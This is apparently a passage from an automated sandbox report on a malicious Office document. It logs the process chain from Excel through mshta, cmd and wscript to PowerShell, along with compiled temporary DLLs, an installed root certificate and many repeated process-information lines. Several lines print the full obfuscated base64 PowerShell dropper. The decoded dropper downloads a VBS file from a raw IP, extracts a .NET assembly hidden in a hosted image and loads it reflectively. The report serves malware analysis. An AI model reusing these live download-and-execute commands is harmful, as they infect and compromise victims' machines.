gvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899A022D push eax; iretd	8_2_000007FE899A0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899A00BD pushad ; iretd	8_2_000007FE899A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899A2243 pushad ; ret	8_2_000007FE899A2261

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
